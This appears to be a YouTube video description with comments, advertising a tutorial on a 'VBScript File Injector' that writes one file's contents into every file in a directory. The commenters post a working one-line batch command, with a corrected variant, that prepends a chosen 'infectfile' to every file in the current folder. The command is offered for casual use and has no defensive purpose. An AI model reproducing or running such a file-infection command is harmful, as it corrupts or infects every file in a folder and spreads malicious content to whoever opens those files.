Hello, Viewers
Today I will be showing you how to create a
VBScript File Injector
What this will do is :
Go Through specified directory and then
Go through each file
Read & place all the contets of the file you're going
to inject into a array.
Inject all the Lines of the array into each file in that directory.
CODE:
http://shorttext.com/fwqnv8iwo
I Hope you've enjoyed this tutorial.
Stay Tuned For More VBScript Tutorials aswell
as my Other Tutorials
Also if you're interested in Visual Basic Tutorials
Check out my (Fun With Visual Basic) FWVB series
http://www.youtube.com/user/stupidgaylogincrap#p/c/51089E6837FEF8AB
___Thanks For Watching____
*RATE*SUBSCRIBE*COMMENT*
@nate0person forgot the second % in the var %infectfile%
@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile%"+"%%i" "%%i"
nate0person 1 year ago
@echo off & set/p "infectfile=[FILENAME]:" & for /f %%i in ('dir /b') do copy /b "%infectfile"+"%%i" "%%i"
three commands in batch, but same output
nate0person 1 year ago
Lol i luv ur screen name
wonkerjk 1 year ago